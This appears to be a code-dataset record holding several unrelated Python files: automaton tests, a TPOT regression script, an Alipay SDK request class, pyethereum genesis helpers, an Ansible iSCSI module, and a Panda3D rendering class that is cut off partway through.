"""Should follow consecutive lambda transitions when validating."""
self.dpda.states = {'q4'}
self.dpda.final_states = {'q4'}
self.dpda.transitions['q2']['']['0'] = ('q3', ('0',))
self.dpda.transitions['q3'] = {
'': {'0': ('q4', ('0',))}
}
nose.assert_equal(
self.dpda.read_input('aabb'),
PDAConfiguration('q4', '', PDAStack(['0']))
)
def test_read_input_rejected_accept_by_final_state(self):
"""Should reject strings if DPDA accepts by final state."""
with nose.assert_raises(exceptions.RejectionException):
self.dpda.read_input('aab')
def test_read_input_rejected_accept_by_empty_stack(self):
"""Should reject strings if DPDA accepts by empty stack."""
with nose.assert_raises(exceptions.RejectionException):
self.dpda.transitions['q2']['']['0'] = ('q2', '')
self.dpda.read_input('aab')
def test_read_input_rejected_undefined_transition(self):
"""Should reject strings which lead to an undefined transition."""
with nose.assert_raises(exceptions.RejectionException):
self.dpda.read_input('01')
def test_accepts_input_true(self):
"""Should return False if DPDA input is not accepted."""
nose.assert_equal(self.dpda.accepts_input('aabb'), True)
def test_accepts_input_false(self):
"""Should return False if DPDA input is rejected."""
nose.assert_equal(self.dpda.accepts_input('aab'), False)
def test_empty_dpda(self):
"""Should accept an empty input if the DPDA is empty."""
dpda = DPDA(
states={'q0'},
input_symbols=set(),
stack_symbols={'0'},
transitions=dict(),
initial_state='q0',
initial_stack_symbol='0',
final_states={'q0'},
acceptance_mode='both'
)
nose.assert_true(dpda.accepts_input(''))
| 40.141243 | 79 | 0.626319 |
e5905be536947f3a01bb67683c6bc9ec6944c315 | 1,249 | py | Python | Python Scripts/tpot_genetic_spitzer_calibration.py | exowanderer/SpitzerDeepLearningNetwork | 37f3ca1731b05f64ec6080bf9e333c7a491840f8 | [
"MIT"
] | 1 | 2022-03-24T10:25:17.000Z | 2022-03-24T10:25:17.000Z | Python Scripts/tpot_genetic_spitzer_calibration.py | exowanderer/SpitzerDeepLearningNetwork | 37f3ca1731b05f64ec6080bf9e333c7a491840f8 | [
"MIT"
] | null | null | null | Python Scripts/tpot_genetic_spitzer_calibration.py | exowanderer/SpitzerDeepLearningNetwork | 37f3ca1731b05f64ec6080bf9e333c7a491840f8 | [
"MIT"
] | null | null | null | from tpot import TPOTRegressor
import pandas as pd
import numpy as np
import warnings
warnings.filterwarnings("ignore")
# from matplotlib import pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.externals import joblib
from sklearn.metrics import r2_score
from time import time
n_skip = 100 # testing on smaller data set
features = pd.read_csv('pmap_raw_16features.csv').iloc[::n_skip]
labels = pd.read_csv('pmap_raw_labels_and_errors.csv')['Flux'].iloc[::n_skip]
#Split training, testing, and validation data
idx = np.arange(labels.values.size)
training_indices, validation_indices = train_test_split(idx, test_size=0.20)
#Let Genetic Programming find best ML model and hyperparameters
tpot = TPOTRegressor(generations=10, verbosity=2, n_jobs=-1)
start = time()
tpot.fit(features.iloc[training_indices].values, labels.iloc[training_indices].values)
print('Full TPOT regressor operation took {:.1f} minutes'.format((time() - start)/60))
#Score the accuracy
print('Best pipeline test accuracy: {:.3f}'.format(
tpot.score(features.iloc[validation_indices].values, labels.iloc[validation_indices].values)))
#Export the generated code
tpot.export('spitzer_calibration_tpot_best_pipeline.py')
| 32.025641 | 96 | 0.783827 |
785a3bca3ce771c9233af5f3ea888fa01bdf5d0a | 3,979 | py | Python | alipay/aop/api/request/KoubeiCateringPosPaymodeDeleteRequest.py | snowxmas/alipay-sdk-python-all | 96870ced60facd96c5bce18d19371720cbda3317 | [
"Apache-2.0"
] | 213 | 2018-08-27T16:49:32.000Z | 2021-12-29T04:34:12.000Z | alipay/aop/api/request/KoubeiCateringPosPaymodeDeleteRequest.py | snowxmas/alipay-sdk-python-all | 96870ced60facd96c5bce18d19371720cbda3317 | [
"Apache-2.0"
] | 29 | 2018-09-29T06:43:00.000Z | 2021-09-02T03:27:32.000Z | alipay/aop/api/request/KoubeiCateringPosPaymodeDeleteRequest.py | snowxmas/alipay-sdk-python-all | 96870ced60facd96c5bce18d19371720cbda3317 | [
"Apache-2.0"
] | 59 | 2018-08-27T16:59:26.000Z | 2022-03-25T10:08:15.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.FileItem import FileItem
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.KoubeiCateringPosPaymodeDeleteModel import KoubeiCateringPosPaymodeDeleteModel
class KoubeiCateringPosPaymodeDeleteRequest(object):
def __init__(self, biz_model=None):
self._biz_model = biz_model
self._biz_content = None
self._version = "1.0"
self._terminal_type = None
self._terminal_info = None
self._prod_code = None
self._notify_url = None
self._return_url = None
self._udf_params = None
self._need_encrypt = False
@property
def biz_model(self):
return self._biz_model
@biz_model.setter
def biz_model(self, value):
self._biz_model = value
@property
def biz_content(self):
return self._biz_content
@biz_content.setter
def biz_content(self, value):
if isinstance(value, KoubeiCateringPosPaymodeDeleteModel):
self._biz_content = value
else:
self._biz_content = KoubeiCateringPosPaymodeDeleteModel.from_alipay_dict(value)
@property
def version(self):
return self._version
@version.setter
def version(self, value):
self._version = value
@property
def terminal_type(self):
return self._terminal_type
@terminal_type.setter
def terminal_type(self, value):
self._terminal_type = value
@property
def terminal_info(self):
return self._terminal_info
@terminal_info.setter
def terminal_info(self, value):
self._terminal_info = value
@property
def prod_code(self):
return self._prod_code
@prod_code.setter
def prod_code(self, value):
self._prod_code = value
@property
def notify_url(self):
return self._notify_url
@notify_url.setter
def notify_url(self, value):
self._notify_url = value
@property
def return_url(self):
return self._return_url
@return_url.setter
def return_url(self, value):
self._return_url = value
@property
def udf_params(self):
return self._udf_params
@udf_params.setter
def udf_params(self, value):
if not isinstance(value, dict):
return
self._udf_params = value
@property
def need_encrypt(self):
return self._need_encrypt
@need_encrypt.setter
def need_encrypt(self, value):
self._need_encrypt = value
def add_other_text_param(self, key, value):
if not self.udf_params:
self.udf_params = dict()
self.udf_params[key] = value
def get_params(self):
params = dict()
params[P_METHOD] = 'koubei.catering.pos.paymode.delete'
params[P_VERSION] = self.version
if self.biz_model:
params[P_BIZ_CONTENT] = json.dumps(obj=self.biz_model.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
if self.biz_content:
if hasattr(self.biz_content, 'to_alipay_dict'):
params['biz_content'] = json.dumps(obj=self.biz_content.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
else:
params['biz_content'] = self.biz_content
if self.terminal_type:
params['terminal_type'] = self.terminal_type
if self.terminal_info:
params['terminal_info'] = self.terminal_info
if self.prod_code:
params['prod_code'] = self.prod_code
if self.notify_url:
params['notify_url'] = self.notify_url
if self.return_url:
params['return_url'] = self.return_url
if self.udf_params:
params.update(self.udf_params)
return params
def get_multipart_params(self):
multipart_params = dict()
return multipart_params
| 27.441379 | 148 | 0.645388 |
987f9a38dc2c0294e13369831944dd780207ccf4 | 6,188 | py | Python | ethereum/genesis_helpers.py | IIIIllllIIIIllllIIIIllllIIIIllllIIIIll/pyethereum | d962694be03686a8e5c1d7459ae272b70a5c9f77 | [
"MIT"
] | 11 | 2017-06-16T13:19:02.000Z | 2021-06-16T02:33:00.000Z | ethereum/genesis_helpers.py | IIIIllllIIIIllllIIIIllllIIIIllllIIIIll/pyethereum | d962694be03686a8e5c1d7459ae272b70a5c9f77 | [
"MIT"
] | 8 | 2017-11-20T15:09:43.000Z | 2018-04-01T09:36:29.000Z | ethereum/genesis_helpers.py | IIIIllllIIIIllllIIIIllllIIIIllllIIIIll/pyethereum | d962694be03686a8e5c1d7459ae272b70a5c9f77 | [
"MIT"
] | 12 | 2017-06-12T15:54:27.000Z | 2018-04-19T03:31:26.000Z | from ethereum.state import State
from ethereum.block import Block, BlockHeader, BLANK_UNCLES_HASH
from ethereum.utils import (
decode_hex,
big_endian_to_int,
encode_hex,
parse_as_bin,
parse_as_int,
normalize_address,
to_string,
)
from ethereum.config import Env
from ethereum.consensus_strategy import get_consensus_strategy
from ethereum.db import OverlayDB, RefcountDB
import rlp
import json
def block_from_genesis_declaration(genesis_data, env):
h = BlockHeader(nonce=parse_as_bin(genesis_data["nonce"]),
difficulty=parse_as_int(genesis_data["difficulty"]),
mixhash=parse_as_bin(
genesis_data.get(
"mixhash", genesis_data.get(
"mixHash", "0" * 64))),
coinbase=parse_as_bin(genesis_data["coinbase"]),
bloom=parse_as_int(genesis_data.get("bloom", "0")),
timestamp=parse_as_int(genesis_data["timestamp"]),
prevhash=parse_as_bin(genesis_data["parentHash"]),
extra_data=parse_as_bin(genesis_data["extraData"]),
gas_used=parse_as_int(genesis_data.get("gasUsed", "0")),
gas_limit=parse_as_int(genesis_data["gasLimit"]))
return Block(h, [], [])
def state_from_genesis_declaration(
genesis_data, env, block=None, allow_empties=False, executing_on_head=False):
if block:
assert isinstance(block, Block)
else:
block = block_from_genesis_declaration(genesis_data, env)
state = State(env=env)
for addr, data in genesis_data["alloc"].items():
addr = normalize_address(addr)
assert len(addr) == 20
if 'wei' in data:
state.set_balance(addr, parse_as_int(data['wei']))
if 'balance' in data:
state.set_balance(addr, parse_as_int(data['balance']))
if 'code' in data:
state.set_code(addr, parse_as_bin(data['code']))
if 'nonce' in data:
state.set_nonce(addr, parse_as_int(data['nonce']))
if 'storage' in data:
for k, v in data['storage'].items():
state.set_storage_data(
addr, big_endian_to_int(
parse_as_bin(k)), big_endian_to_int(
parse_as_bin(v)))
get_consensus_strategy(state.config).initialize(state, block)
if executing_on_head:
state.executing_on_head = True
state.commit(allow_empties=allow_empties)
print('deleting %d' % len(state.deletes))
rdb = RefcountDB(state.db)
for delete in state.deletes:
rdb.delete(delete)
block.header.state_root = state.trie.root_hash
state.changed = {}
state.prev_headers = [block.header]
return state
def initialize_genesis_keys(state, genesis):
db = state.db
db.put(b'GENESIS_NUMBER', to_string(genesis.header.number))
db.put(b'GENESIS_HASH', to_string(genesis.header.hash))
db.put(b'GENESIS_STATE', json.dumps(state.to_snapshot()))
db.put(b'GENESIS_RLP', rlp.encode(genesis))
db.put(b'block:0', genesis.header.hash)
db.put(b'score:' + genesis.header.hash, "0")
db.put(b'state:' + genesis.header.hash, state.trie.root_hash)
db.put(genesis.header.hash, b'GENESIS')
db.commit()
def mk_genesis_data(env, **kwargs):
assert isinstance(env, Env)
allowed_args = set([
'start_alloc',
'parent_hash',
'coinbase',
'difficulty',
'gas_limit',
'timestamp',
'extra_data',
'mixhash',
'nonce',
])
assert set(kwargs.keys()).issubset(allowed_args)
genesis_data = {
"parentHash": kwargs.get('parent_hash', encode_hex(env.config['GENESIS_PREVHASH'])),
"coinbase": kwargs.get('coinbase', encode_hex(env.config['GENESIS_COINBASE'])),
"difficulty": kwargs.get('difficulty', env.config['GENESIS_DIFFICULTY']),
"gasLimit": kwargs.get('gas_limit', env.config['GENESIS_GAS_LIMIT']),
"timestamp": kwargs.get('timestamp', 0),
"extraData": kwargs.get('extra_data', encode_hex(env.config['GENESIS_EXTRA_DATA'])),
"mixhash": kwargs.get('mixhash', encode_hex(env.config['GENESIS_MIXHASH'])),
"nonce": kwargs.get('nonce', encode_hex(env.config['GENESIS_NONCE'])),
"alloc": kwargs.get('start_alloc', env.config['GENESIS_INITIAL_ALLOC'])
}
return genesis_data
def mk_genesis_block(env, **kwargs):
genesis_data = mk_genesis_data(env, **kwargs)
block = block_from_genesis_declaration(genesis_data, env)
state = state_from_genesis_declaration(genesis_data, env, block=block)
return block
def mk_basic_state(alloc, header=None, env=None, executing_on_head=False):
env = env or Env()
state = State(env=env, executing_on_head=executing_on_head)
if not header:
header = {
"number": 0, "gas_limit": env.config['BLOCK_GAS_LIMIT'],
"gas_used": 0, "timestamp": 1467446877, "difficulty": 1,
"uncles_hash": '0x' + encode_hex(BLANK_UNCLES_HASH)
}
h = BlockHeader(number=parse_as_int(header['number']),
timestamp=parse_as_int(header['timestamp']),
difficulty=parse_as_int(header['difficulty']),
gas_limit=parse_as_int(header['gas_limit']),
uncles_hash=parse_as_bin(header['uncles_hash']))
state.prev_headers = [h]
for addr, data in alloc.items():
addr = normalize_address(addr)
assert len(addr) == 20
if 'wei' in data:
state.set_balance(addr, parse_as_int(data['wei']))
if 'balance' in data:
state.set_balance(addr, parse_as_int(data['balance']))
if 'code' in data:
state.set_code(addr, parse_as_bin(data['code']))
if 'nonce' in data:
state.set_nonce(addr, parse_as_int(data['nonce']))
if 'storage' in data:
for k, v in data['storage'].items():
state.set_storage_data(addr, parse_as_bin(k), parse_as_bin(v))
state.block_number = header["number"]
state.gas_limit = header["gas_limit"]
state.timestamp = header["timestamp"]
state.block_difficulty = header["difficulty"]
state.commit()
return state
| 38.197531 | 92 | 0.643342 |
2e1574dceaa3007d6fb829f6da4cb41833494c46 | 11,893 | py | Python | ansible/modules/system/open_iscsi.py | EnjoyLifeFund/py36pkgs | 0ac677fbbfa7b6d8c527fe2c759ba05117b07fd2 | [
"MIT",
"BSD-2-Clause",
"BSD-3-Clause"
] | null | null | null | ansible/modules/system/open_iscsi.py | EnjoyLifeFund/py36pkgs | 0ac677fbbfa7b6d8c527fe2c759ba05117b07fd2 | [
"MIT",
"BSD-2-Clause",
"BSD-3-Clause"
] | null | null | null | ansible/modules/system/open_iscsi.py | EnjoyLifeFund/py36pkgs | 0ac677fbbfa7b6d8c527fe2c759ba05117b07fd2 | [
"MIT",
"BSD-2-Clause",
"BSD-3-Clause"
] | 1 | 2020-02-13T14:24:57.000Z | 2020-02-13T14:24:57.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2013, Serge van Ginderachter <serge@vanginderachter.be>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: open_iscsi
author: "Serge van Ginderachter (@srvg)"
version_added: "1.4"
short_description: Manage iscsi targets with open-iscsi
description:
- Discover targets on given portal, (dis)connect targets, mark targets to
manually or auto start, return device nodes of connected targets.
requirements:
- open_iscsi library and tools (iscsiadm)
options:
portal:
required: false
aliases: [ip]
description:
- the ip address of the iscsi target
port:
required: false
default: 3260
description:
- the port on which the iscsi target process listens
target:
required: false
aliases: [name, targetname]
description:
- the iscsi target name
login:
required: false
choices: [true, false]
description:
- whether the target node should be connected
node_auth:
required: false
default: CHAP
description:
- discovery.sendtargets.auth.authmethod
node_user:
required: false
description:
- discovery.sendtargets.auth.username
node_pass:
required: false
description:
- discovery.sendtargets.auth.password
auto_node_startup:
aliases: [automatic]
required: false
choices: [true, false]
description:
- whether the target node should be automatically connected at startup
discover:
required: false
choices: [true, false]
description:
- whether the list of target nodes on the portal should be
(re)discovered and added to the persistent iscsi database.
Keep in mind that iscsiadm discovery resets configurtion, like node.startup
to manual, hence combined with auto_node_startup=yes will always return
a changed state.
show_nodes:
required: false
choices: [true, false]
description:
- whether the list of nodes in the persistent iscsi database should be
returned by the module
'''
EXAMPLES = '''
# perform a discovery on 10.1.2.3 and show available target nodes
- open_iscsi:
show_nodes: yes
discover: yes
portal: 10.1.2.3
# discover targets on portal and login to the one available
# (only works if exactly one target is exported to the initiator)
- open_iscsi:
portal: '{{ iscsi_target }}'
login: yes
discover: yes
# description: connect to the named target, after updating the local
# persistent database (cache)
- open_iscsi:
login: yes
target: 'iqn.1986-03.com.sun:02:f8c1f9e0-c3ec-ec84-c9c9-8bfb0cd5de3d'
# description: discconnect from the cached named target
- open_iscsi:
login: no
target: 'iqn.1986-03.com.sun:02:f8c1f9e0-c3ec-ec84-c9c9-8bfb0cd5de3d'
'''
import glob
import time
ISCSIADM = 'iscsiadm'
def compare_nodelists(l1, l2):
l1.sort()
l2.sort()
return l1 == l2
def iscsi_get_cached_nodes(module, portal=None):
cmd = '%s --mode node' % iscsiadm_cmd
(rc, out, err) = module.run_command(cmd)
if rc == 0:
lines = out.splitlines()
nodes = []
for line in lines:
# line format is "ip:port,target_portal_group_tag targetname"
parts = line.split()
if len(parts) > 2:
module.fail_json(msg='error parsing output', cmd=cmd)
target = parts[1]
parts = parts[0].split(':')
target_portal = parts[0]
if portal is None or portal == target_portal:
nodes.append(target)
# older versions of scsiadm don't have nice return codes
# for newer versions see iscsiadm(8); also usr/iscsiadm.c for details
# err can contain [N|n]o records...
elif rc == 21 or (rc == 255 and "o records found" in err):
nodes = []
else:
module.fail_json(cmd=cmd, rc=rc, msg=err)
return nodes
def iscsi_discover(module, portal, port):
cmd = '%s --mode discovery --type sendtargets --portal %s:%s' % (iscsiadm_cmd, portal, port)
(rc, out, err) = module.run_command(cmd)
if rc > 0:
module.fail_json(cmd=cmd, rc=rc, msg=err)
def target_loggedon(module, target):
cmd = '%s --mode session' % iscsiadm_cmd
(rc, out, err) = module.run_command(cmd)
if rc == 0:
return target in out
elif rc == 21:
return False
else:
module.fail_json(cmd=cmd, rc=rc, msg=err)
def target_login(module, target):
node_auth = module.params['node_auth']
node_user = module.params['node_user']
node_pass = module.params['node_pass']
if node_user:
params = [('node.session.auth.authmethod', node_auth),
('node.session.auth.username', node_user),
('node.session.auth.password', node_pass)]
for (name, value) in params:
cmd = '%s --mode node --targetname %s --op=update --name %s --value %s' % (iscsiadm_cmd, target, name, value)
(rc, out, err) = module.run_command(cmd)
if rc > 0:
module.fail_json(cmd=cmd, rc=rc, msg=err)
cmd = '%s --mode node --targetname %s --login' % (iscsiadm_cmd, target)
(rc, out, err) = module.run_command(cmd)
if rc > 0:
module.fail_json(cmd=cmd, rc=rc, msg=err)
def target_logout(module, target):
cmd = '%s --mode node --targetname %s --logout' % (iscsiadm_cmd, target)
(rc, out, err) = module.run_command(cmd)
if rc > 0:
module.fail_json(cmd=cmd, rc=rc, msg=err)
def target_device_node(module, target):
# if anyone know a better way to find out which devicenodes get created for
# a given target...
devices = glob.glob('/dev/disk/by-path/*%s*' % target)
devdisks = []
for dev in devices:
# exclude partitions
if "-part" not in dev:
devdisk = os.path.realpath(dev)
# only add once (multi-path?)
if devdisk not in devdisks:
devdisks.append(devdisk)
return devdisks
def target_isauto(module, target):
cmd = '%s --mode node --targetname %s' % (iscsiadm_cmd, target)
(rc, out, err) = module.run_command(cmd)
if rc == 0:
lines = out.splitlines()
for line in lines:
if 'node.startup' in line:
return 'automatic' in line
return False
else:
module.fail_json(cmd=cmd, rc=rc, msg=err)
def target_setauto(module, target):
cmd = '%s --mode node --targetname %s --op=update --name node.startup --value automatic' % (iscsiadm_cmd, target)
(rc, out, err) = module.run_command(cmd)
if rc > 0:
module.fail_json(cmd=cmd, rc=rc, msg=err)
def target_setmanual(module, target):
cmd = '%s --mode node --targetname %s --op=update --name node.startup --value manual' % (iscsiadm_cmd, target)
(rc, out, err) = module.run_command(cmd)
if rc > 0:
module.fail_json(cmd=cmd, rc=rc, msg=err)
def main():
# load ansible module object
module = AnsibleModule(
argument_spec = dict(
# target
portal = dict(required=False, aliases=['ip']),
port = dict(required=False, default=3260),
target = dict(required=False, aliases=['name', 'targetname']),
node_auth = dict(required=False, default='CHAP'),
node_user = dict(required=False),
node_pass = dict(required=False, no_log=True),
# actions
login = dict(type='bool', aliases=['state']),
auto_node_startup = dict(type='bool', aliases=['automatic']),
discover = dict(type='bool', default=False),
show_nodes = dict(type='bool', default=False)
),
required_together=[['discover_user', 'discover_pass'],
['node_user', 'node_pass']],
supports_check_mode=True
)
global iscsiadm_cmd
iscsiadm_cmd = module.get_bin_path('iscsiadm', required=True)
# parameters
portal = module.params['portal']
target = module.params['target']
port = module.params['port']
login = module.params['login']
automatic = module.params['auto_node_startup']
discover = module.params['discover']
show_nodes = module.params['show_nodes']
check = module.check_mode
cached = iscsi_get_cached_nodes(module, portal)
# return json dict
result = {}
result['changed'] = False
if discover:
if portal is None:
module.fail_json(msg = "Need to specify at least the portal (ip) to discover")
elif check:
nodes = cached
else:
iscsi_discover(module, portal, port)
nodes = iscsi_get_cached_nodes(module, portal)
if not compare_nodelists(cached, nodes):
result['changed'] |= True
result['cache_updated'] = True
else:
nodes = cached
if login is not None or automatic is not None:
if target is None:
if len(nodes) > 1:
module.fail_json(msg = "Need to specify a target")
else:
target = nodes[0]
else:
# check given target is in cache
check_target = False
for node in nodes:
if node == target:
check_target = True
break
if not check_target:
module.fail_json(msg = "Specified target not found")
if show_nodes:
result['nodes'] = nodes
if login is not None:
loggedon = target_loggedon(module, target)
if (login and loggedon) or (not login and not loggedon):
result['changed'] |= False
if login:
result['devicenodes'] = target_device_node(module, target)
elif not check:
if login:
target_login(module, target)
# give udev some time
time.sleep(1)
result['devicenodes'] = target_device_node(module, target)
else:
target_logout(module, target)
result['changed'] |= True
result['connection_changed'] = True
else:
result['changed'] |= True
result['connection_changed'] = True
if automatic is not None:
isauto = target_isauto(module, target)
if (automatic and isauto) or (not automatic and not isauto):
result['changed'] |= False
result['automatic_changed'] = False
elif not check:
if automatic:
target_setauto(module, target)
else:
target_setmanual(module, target)
result['changed'] |= True
result['automatic_changed'] = True
else:
result['changed'] |= True
result['automatic_changed'] = True
module.exit_json(**result)
# import module snippets
from ansible.module_utils.basic import *
if __name__ == '__main__':
main()
| 30.41688 | 121 | 0.60523 |
d6c8f06999e21b4fc3906ca6eedf8c73de959d23 | 46,727 | py | Python | PandaRender.py | galsh17/cartwheel_train | a50abe18cfe8c1f0f24267c3efa8537ecf211e72 | [
"MIT"
] | 32 | 2018-09-04T08:51:08.000Z | 2022-02-22T02:04:38.000Z | PandaRender.py | galsh17/cartwheel_train | a50abe18cfe8c1f0f24267c3efa8537ecf211e72 | [
"MIT"
] | 5 | 2019-05-27T07:54:52.000Z | 2022-01-11T10:14:25.000Z | PandaRender.py | galsh17/cartwheel_train | a50abe18cfe8c1f0f24267c3efa8537ecf211e72 | [
"MIT"
] | 14 | 2018-06-22T15:29:39.000Z | 2021-09-28T12:58:37.000Z | """ The training-render file. (class TrainRenderer)
Update: This class is render only class. It does not take the mainloop()
control. Basically need to call function step().
Defines a rendering class. Defines a spinTask (panda3d) which basicalyl
renders 16-cameras at a time and sets them into a CPU-queue. This queue
is emtied by calls to step(). May build more purpose-build steps()s
update: There are 3 Panda renderer in this file, viz. TrainRenderer,
TestRenderer, NetVLADRenderer. For comments on what each does check out
those classes. For general usage of the renderers see `test_render.py`
"""
# Panda3d
from direct.showbase.ShowBase import ShowBase
from panda3d.core import *
from direct.stdpy.threading2 import Thread
# Usual Math and Image Processing
import numpy as np
import cv2
from scipy import interpolate
# import caffe
# import tensorflow as tf
# Other System Libs
import os
import argparse
import Queue
import copy
import time
import code
import pickle
# Custom-Misc
import TerminalColors
import CubeMaker
import PathMaker
class TrainRenderer(ShowBase):
renderIndx=0
# Basic Mesh & Camera Setup
def loadAllTextures(self, mesh, basePath, silent=True):
""" Loads texture files for a mesh """
c = 0
for child in mesh.getChildren():
submesh_name = child.get_name()
submesh_texture = basePath + submesh_name[:-5] + 'tex0.jpg'
child.setTexture( self.loader.loadTexture(submesh_texture) )
if silent == False:
print 'Loading texture file : ', submesh_texture
c = c + 1
print self.tcolor.OKGREEN, "Loaded ", c, "textures", self.tcolor.ENDC
def setupMesh(self):
""" Loads the .obj files. Will load mesh sub-divisions separately """
print 'Attempt Loading Mesh VErtices, FAces'
self.cyt = self.loader.loadModel( 'model_l/l6/level_6_0_0.obj' )
self.cyt2 = self.loader.loadModel( 'model_l/l6/level_6_128_0.obj' )
self.low_res = self.loader.loadModel( 'model_l/l3/level_3_0_0.obj' )
print self.tcolor.OKGREEN, 'Done Loading Vertices', self.tcolor.ENDC
print 'Attempt Loading Textures'
self.loadAllTextures( self.cyt, 'model_l/l6/')
self.loadAllTextures( self.cyt2, 'model_l/l6/')
self.loadAllTextures( self.low_res, 'model_l/l3/')
print self.tcolor.OKGREEN, 'Done Loading Textures', self.tcolor.ENDC
def positionMesh(self):
""" WIll have to manually adjust this for ur mesh. I position the
center where I fly my drone and oriented in ENU (East-north-up)
cords for easy alignment of GPS and my cordinates. If your model
is not metric scale will have to adjust for that too"""
self.cyt.setPos( 140,-450, 150 )
self.cyt2.setPos( 140,-450, 150 )
self.low_res.setPos( 140,-450, 150 )
self.cyt.setHpr( 198, -90, 0 )
self.cyt2.setHpr( 198, -90, 0 )
self.low_res.setHpr( 198, -90, 0 )
self.cyt.setScale(172)
self.cyt2.setScale(172)
self.low_res.setScale(172)
def customCamera(self, nameIndx):
lens = self.camLens
lens.setFov(83)
print 'self.customCamera : Set FOV at 83'
my_cam = Camera("cam"+nameIndx, lens)
my_camera = self.scene0.attachNewNode(my_cam)
# my_camera = self.render.attachNewNode(my_cam)
my_camera.setName("camera"+nameIndx)
return my_camera
def customDisplayRegion(self, rows, cols):
rSize = 1.0 / rows
cSize = 1.0 / cols
dr_list = []
for i in range(0,rows):
for j in range(0,cols):
# print i*rSize, (i+1)*rSize, j*cSize, (j+1)*cSize
dr_i = self.win2.makeDisplayRegion(i*rSize, (i+1)*rSize, j*cSize, (j+1)*cSize)
dr_i.setSort(-5)
dr_list.append( dr_i )
return dr_list
## Gives a random 6-dof pose. Need to set params manually here.
## X,Y,Z, Yaw(abt Z-axis), Pitch(abt X-axis), Roll(abt Y-axis)
## @param No : no inputs
def monte_carlo_sample(self):
# mc_X_min etc are set in constructor
X = np.random.uniform(self.mc_X_min,self.mc_X_max)
Y = np.random.uniform(self.mc_Y_min,self.mc_Y_max)
Z = np.random.uniform(self.mc_Z_min,self.mc_Z_max)
yaw = np.random.uniform( self.mc_yaw_min, self.mc_yaw_max)
roll = 0#np.random.uniform( self.mc_roll_min, self.mc_roll_max)
pitch = 0#np.random.uniform( self.mc_pitch_min, self.mc_pitch_max)
return X,Y,Z, yaw,roll,pitch
## Annotation-helpers for self.render
def putBoxes(self,X,Y,Z,r=1.,g=0.,b=0., scale=1.0):
cube_x = CubeMaker.CubeMaker().generate()
cube_x.setColor(r,g,b)
cube_x.setScale(scale)
cube_x.reparentTo(self.render)
cube_x.setPos(X,Y,Z)
## Set a cube in 3d env
def putTrainingBox(self,task):
cube = CubeMaker.CubeMaker().generate()
cube.setTransparency(TransparencyAttrib.MAlpha)
cube.setAlphaScale(0.5)
# cube.setScale(10)
# mc_X_min etc are set in constructor
sx = 0.5 * (self.mc_X_max - self.mc_X_min)
sy = 0.5 * (self.mc_Y_max - self.mc_Y_min)
sz = 0.5 * (self.mc_Z_max - self.mc_Z_min)
ax = 0.5 * (self.mc_X_max + self.mc_X_min)
ay = 0.5 * (self.mc_Y_max + self.mc_Y_min)
az = 0.5 * (self.mc_Z_max + self.mc_Z_min)
cube.setSx(sx)
cube.setSy(sy)
cube.setSz(sz)
cube.reparentTo(self.render)
cube.setPos(ax,ay,az)
## Task. This task draw the XYZ axis
def putAxesTask(self,task):
if (task.frame / 10) % 2 == 0:
cube_x = CubeMaker.CubeMaker().generate()
cube_x.setColor(1.0,0.0,0.0)
cube_x.setScale(1)
cube_x.reparentTo(self.render)
cube_x.setPos(task.frame,0,0)
cube_y = CubeMaker.CubeMaker().generate()
cube_y.setColor(0.0,1.0,0.0)
cube_y.setScale(1)
cube_y.reparentTo(self.render)
cube_y.setPos(0,task.frame,0)
cube_z = CubeMaker.CubeMaker().generate()
cube_z.setColor(0.0,0.0,1.0)
cube_z.setScale(1)
cube_z.reparentTo(self.render)
cube_z.setPos(0,0,task.frame)
if task.time > 25:
return None
return task.cont
## Render-n-Learn task
##
## set pose in each camera <br/>
## make note of the poses just set as this will take effect next <br/>
## Retrive Rendered Data <br/>
## Cut rendered data into individual image. Note rendered data will be 4X4 grid of images <br/>
## Put imX into the queue <br/>
def renderNlearnTask(self, task):
if task.time < 2: #do not do anything for 1st 2 sec
return task.cont
# print randX, randY, randZ
#
## set pose in each camera
# Note: The texture is grided images in a col-major format
poses = np.zeros( (len(self.cameraList), 4), dtype='float32' )
for i in range(len(self.cameraList)):
randX,randY, randZ, randYaw, randPitch, randRoll = self.monte_carlo_sample()
# if i<4 :
# randX = (i) * 30
# else:
# randX = 0
#
# randY = 0#task.frame
# randZ = 80
# randYaw = 0
# randPitch = 0
# randRoll = 0
self.cameraList[i].setPos(randX,randY,randZ)
self.cameraList[i].setHpr(randYaw,-90+randPitch,0+randRoll)
poses[i,0] = randX
poses[i,1] = randY
poses[i,2] = randZ
poses[i,3] = randYaw
# self.putBoxes(randX,randY,randZ, scale=0.3)
#
# if task.frame < 100:
# return task.cont
# else:
# return None
## make note of the poses just set as this will take effect next
if TrainRenderer.renderIndx == 0:
TrainRenderer.renderIndx = TrainRenderer.renderIndx + 1
self.prevPoses = poses
return task.cont
#
## Retrive Rendered Data
tex = self.win2.getScreenshot()
A = np.array(tex.getRamImageAs("RGB")).reshape(960,1280,3)
# A = np.zeros((960,1280,3))
# A_bgr = cv2.cvtColor(A.astype('uint8'),cv2.COLOR_RGB2BGR)
# cv2.imwrite( str(TrainRenderer.renderIndx)+'.png', A_bgr.astype('uint8') )
# myTexture = self.win2.getTexture()
# print myTexture
# retrive poses from prev render
texPoses = self.prevPoses
#
## Cut rendered data into individual image. Note rendered data will be 4X4 grid of images
#960 rows and 1280 cols (4x4 image-grid)
nRows = 240
nCols = 320
# Iterate over the rendered texture in a col-major format
c=0
if self.q_imStack.qsize() < 150:
for j in range(4): #j is for cols-indx
for i in range(4): #i is for rows-indx
#print i*nRows, j*nCols, (i+1)*nRows, (j+1)*nCols
im = A[i*nRows:(i+1)*nRows,j*nCols:(j+1)*nCols,:]
